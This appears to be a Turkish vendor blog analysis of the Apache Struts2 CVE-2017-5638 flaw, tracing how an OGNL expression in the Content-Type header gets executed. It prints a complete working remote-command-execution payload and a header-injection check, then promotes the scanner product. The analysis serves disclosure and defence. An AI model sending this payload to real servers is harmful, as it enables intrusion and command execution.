Apache Struts2 Zafiyeti

Kategori: Web Güvenliği - Güncellenme: 17 Mart 2017 - Omar Kurt

Giriş

 • Struts 1.0 ilk olarak 2001’in ortasında yayınlandı, Java tabanlı web framework.
 • Apache Vakfı’nın Jakarta Projesinin bir parçasıdır.
 • OGNL (Object-Graph Navigation Language) ifade dili desteği bulunmaktadır.
 • CVE-2017-5638 olarak bildirildi.
 • "Jakarta Struts" veya "Apache Struts" olarak bilinir.
 • Jakarta Multipart Parser File Upload sınıfında bulunan bir zafiyet.
 • Etkilenen versiyonlar ve altyapıyı kullanan ürünler

Zafiyet İncelemesi

Content-Type’ına (#_='multipart/form-data') kullanarak kontrolü geçmiş oluyoruz.

Apache-Struts2-Zafiyeti-1

parse metodunda gönderdiğimiz payload hata döndüğü için buildErrorMessage’a set ediliyor.

Apache-Struts2-Zafiyeti-2

buildErrorMessage içerisine baktığımızda, LocalizedTextUtil class'ında findText'e gelen hataları ayrıştırıyor.

Apache-Struts2-Zafiyeti-3

Tam da burada bizim OGNL ifademiz execute ediliyor. Ve sistem üzerinde istediğimiz Komut Enjeksiyonunu yapabiliyoruz.

Apache-Struts2-Zafiyeti-4

Zafiyetin Sömürülmesi

 • İki farklı OGNL ifade tanımlaması var
  • .multipart/form-data~${ COMMAND }
  • %{(#nike='multipart/form-data').( COMMAND )}

Aslında yukarıda belirtmiş olduğum farklılığın bir anlamı yok, her ikisi de zafiyet bulunan bir sistem üzerinde çalışabilir.

Header Enjeksiyonu ile Doğrulama

.multipart/form-data~${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("NS-Strust2",1336+1)}

Com.opensymphony.xwork2 paketini kullanarak HttpServletResponse.addHeader ile Header’a istediğimiz Name:Value set ediyoruz.

Apache-Struts2-Zafiyeti-5

Komut Enjeksiyonu

OGNL ifadesini kullanarak istediğimiz Kod Enjeksiyonunu yapabiliriz.

Payload;

%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo N3TSP4RK3R').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Apache-Struts2-Zafiyeti-6

Netsparker Zafiyet Keşfi ve Exploit Edilmesi

Apache Struts2 zafiyetinin tespitini Netsparker olarak otomatize ediyoruz.

Netsparker'ın Get Shell aracını kullanarak, zafiyet barındıran sistem üzerinde kod çalıştırabiliriz.

Apache-Struts2-Zafiyeti-7

Test Ortamı

Struts : 2.3.12
Tomcat : Tomcat/7.0.56 (Debian)

Referanslar:

Netsparker

Tam isabet, hızlı ve kolay kullanım

DEMO İNDİR